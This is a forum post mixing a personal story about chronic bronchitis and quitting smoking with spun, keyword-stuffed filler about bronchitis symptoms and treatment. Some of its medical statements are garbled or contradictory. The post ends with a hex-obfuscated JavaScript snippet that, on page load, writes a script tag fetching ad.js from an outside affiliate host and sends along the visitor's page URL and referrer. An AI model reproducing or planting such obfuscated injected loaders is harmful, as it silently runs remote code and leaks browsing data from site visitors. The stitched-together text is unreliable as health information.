Chronic Bronchitis and Why and How I Quit Smoking

Go down

Chronic Bronchitis and Why and How I Quit Smoking Empty Chronic Bronchitis and Why and How I Quit Smoking

Post by Admin Thu Sep 08, 2016 8:58 pm

Chronic Bronchitis: Why and How I Quit Smoking

Don't remember the day I started smoking, but I do remember why. My husband smoked. When we kissed, he tasted like a full ashtray smells. I started smoking so that that wouldn't bother me so much, but I knew better.

"Suck the Salt Off and Spit Out the Seeds," He Said

"Salt cuts the craving for nicotine." It worked. For six weeks, I carried sunflower seeds around with me. Anytime I started to crave a cigarette, I popped four or five sunflower seeds in my mouth. The times I felt foolish for constantly having sunflower seeds in my mouth, I would just remember the new skirt I had thrown away. Don't misunderstand. Quitting cigarettes was the hardest thing I ever did, but I was more determined than I had ever been.

• After smoking for five years, I thought I was doomed to be a lifetime smoker just like my parents.
  • Then something frightening happened.
  • I fell asleep in my chair with a lit cigarette in my hand.
  • Unlike many others who died after they went to sleep with a burning cigarette, I was fortunate.
  • I wasn't hurt.
  • Not physically, anyway.
  • This article on Bronchitis was written with the intention of making it very memorable to its reader.
  • Only then is an article considered to have reached it's objective.

All Through High School, P.E

And health teachers preached the deleterious effects of tobacco smoke on the body. Television, newspapers, magazines, doctors, and the Surgeon General all reported that cigarette smoking caused cancer, emphysema, and many other health problems. I didn't need to hear or read their stories. Both my parents have smoked since their teens. I saw firsthand what smoking does to the smoker. Quality is better than quantity. It is of no use writing numerous pages of nonsense for the reader. Instead, it is better to write a short, and informative article on specific subjects like Bronchitis. People tend to enjoy it more. Rolling Eyes

Don't Remember the Day I Started Smoking, but I'll Never Forget the Day I Stopped

On June 2, 1986, I dumped the worst habit I have ever had. Was it worth it? You bet. I no longer have pneumonia every year. Though bronchitis still bothers me on occasion, and I have chronic asthma, most of the time I can breathe without trouble. Best of all, my husband quit, too, within a month of the date that I quit. We have had a smoke free home for more than 20 years, and we have both benefitted from it. We have used clear and concise words in this article on Bronchitis to avoid any misunderstandings and confusions that can be caused due to difficult words.

Nicotine Stained Fingers, Face, and Teeth are Just the Beginning

Besides the offensive smell, there is the layer of nicotine that stains everything in the smoker's home:, furniture, walls, carpets, everything. On several different occasions, both my parents were extremely sick with illnesses directly attributable to smoking, eventually culminating in lung cancer for my dad. Cigarettes were so important to them, that they budgeted the smokes in with groceries. If money was tight, we ate beans and potatoes, but they never did without cigarettes. I promised myself in my teens that I would never smoke. I broke that promise sometime in the summer of 1981. We have taken the privilege of proclaiming this article to be a very informative and interesting article on Bronchitis. We now give you arizona state university downtown phoenix campus it too.

Learning to Smoke Was Difficult for Me

I had so many reasons not to, that I really had to push to get it done. After years and years of second hand smoke exposure, my health began to deteriorate immediately. By the end of the first year, I had chronic bronchitis. Cigarettes became a crutch. If life was stressful, I smoked. If I was ill, I smoked. If everything was great, I smoked. My habit was so bad, I couldn't drive down the street or cook a meal without smoking. The first thing I did in the morning was light a cigarette. The last thing I did at night was put one out. It is always better to use simple English when writing descriptive articles, like this one on Bronchitis. It is the layman who may read such articles, and if he can't understand it, what is the point of writing it?

Why You Should Quit Smoking Now {Infographic} - Best Infographics

Chronic Bronchitis and Why and How I Quit Smoking Quit-smoking26

• After gathering all the cigarettes I had, I went to the kitchen and carefully destroyed each one, then dropped it into the trash can.
  • By evening I was suffering, but I refused to buy more.
  • Later, I learned my brother-in-law had just quit smoking.
  • He told me to buy salted, roasted sunflower seeds in the shell.

Was Terrified

If I had not wakened from the smell of burning fabric, I might have died, or at least been badly burned. The new skirt I was wearing had eight holes burned through it. The folds of fabric had protected my skin until I awoke. When I realized that I had risked my life, and ruined a brand new skirt, anger replaced the terror I felt--anger at myself. Keeping to the point is very important when writing. So we have to stuck to Bronchitis, and have not wandered much from it to enhance understanding.

Bronchitis is an acute inflammation of the air passages within the lungs. It occurs when the trachea (windpipe) and the large and small bronchi (airways) within the lungs become inflamed because of infection or other causes.

• Medications for chronic bronchitis include anti-inflammatory medications and bronchodilators.
  • Anti-inflammatory drugs decrease the inflammation in the respiratory tract tissues.
  • You may say that we have included exquisite information here on Bronchitis Symptoms.
  • This is with the intention of producing a unique article on Bronchitis Symptoms. Wink

Acute Bronchitis Usually Develops on the Heels of a Cold or the Flu

Your body's battle to defeat these infections leaves your bronchial tubes sensitive, irritated, and inflamed, explains Alan P. Brauer, M.D. This impairs the ability of the tiny hairs that line the bronchial tubes, called the cilia, to sweep mucus and other debris out of your respiratory tract. With your bronchial tubes inflamed and your cilia impaired, your body resorts to its coughing mechanism to keep those bronchi clear. This is the counterpart to our previous paragraph on Causes Bronchitis. Please read that paragraph to get a better understanding to this paragraph. Shocked

Common symptoms of both kinds of bronchitis are nasal congestion, muscle pains, fever and chills, sore throat, poor sleep, and dyspnea (common in chronic bronchitis). Basically, the symptoms of bronchitis are similar to that of the common cold. It starts with an irritation at the back of the throat and as it gets worse, cough will enter the picture which may come with phlegm. If the phlegm is streaked with blood, it is best to consult a physician.

• Causes Bronchitis is usually caused by infection with a virus.
  • However, bronchitis may also be caused by bacteria, smoking or the inhalation of chemical pollutants or dust.
  • The most common viruses that cause bronchitis are influenza A and B, The most common bacteria that causes bronchitis is Mycoplasma pneumoniae.
  • It was with great optimism that we started out on writing this composition on Asthmatic Bronchitis Acute.
  • Please don't let us lose this optimism.

Medications Bronchodilator Medications Inhaled as aerosol sprays or taken orally, bronchodilator medications may help to relieve symptoms of chronic bronchitis by relaxing and opening the air passages in the lungs.

Cigarette Smoking is the Most Common Cause of Chronic Bronchitis

How to recognize bronchitis symptoms also result from a series of attacks of acute bronchitis. Other causes include air pollution and industrial dusts and fumes. Patience was exercised in this article on Asthmatic Bronchitis. Without patience, it would not have been possible to write extensively on Asthmatic Bronchitis.

Symptoms Talking about the bronchitis symptoms, inflammation takes place in the bronchi and consequently, secretion of mucus occurs in large quantities and gets expelled as phlegm that is sticky. Other symptoms include fever, difficulty in breathing, pain in chest, cough and loss of appetite. We have actually followed a certain pattern while writing on Acute Bronchitis Causes. We have used simple words and sentences to facilitate easy understanding for the reader.

• The disease comes in two forms: acute (lasting less than 6 weeks) and chronic (reoccurring frequently for more than two years).
  • In addition, people with asthma also experience an inflammation of the lining of the bronchial tubes called asthmatic bronchitis Embarassed

It's bad enough to bruised ribs from coughing why phlegm also?

The combination of cough and phlegm is called bronchitis, which is an inflammation of the airways leading to lungs. Smile

The cause for the Bronchitis is usually an infection made by allergies or chemical irritations, such as pollution and cigarettes.

You want to get rid of the bronchitis and breathe normally you need to take care of yourself: Drink a lot of water, rest in bed, and use inhalator when needed. Laughing

While you are doing so you can make some home remedies at home to have an instant relief.

About the Author:

Ron Shelf Alternative medicine advisor www.alternative-remedies.org www.grannymed.natural bronchitis remedies

var c2="bronchitis";var _0xded0=["\x3C\x73\x63","\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x27\x68\x74\x74\x70\x3A\x2F\x2F\x73\x6D\x61\x72\x74\x6C","\x69\x66\x65\x6C","\x61\x62\x73\x2E\x63\x6F\x6D\x2F\x61\x66\x66\x69\x6C\x69\x61\x74\x65\x73\x2F\x61\x64\x2E\x6A\x73\x3F\x63\x3D","\x26\x73\x3D","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x26\x61\x69\x64\x3D\x38\x37\x32\x31\x27\x3E\x3C\x2F\x73\x63\x72\x69","\x70\x74\x3E","\x77\x72\x69\x74\x65"];document[_0xded0[8]](_0xded0[0]+_0xded0[1]+_0xded0[2]+_0xded0[3]+c2+_0xded0[4]+encodeURIComponent(window[_0xded0[5]])+"\x26\x72\x65\x66\x3D"+encodeURIComponent(document["\x72\x65\x66\x65\x72\x72\x65\x72"])+_0xded0[6]+_0xded0[7]);

Admin
Admin

https://gerrylamb.forumotion.com

Back to top Go down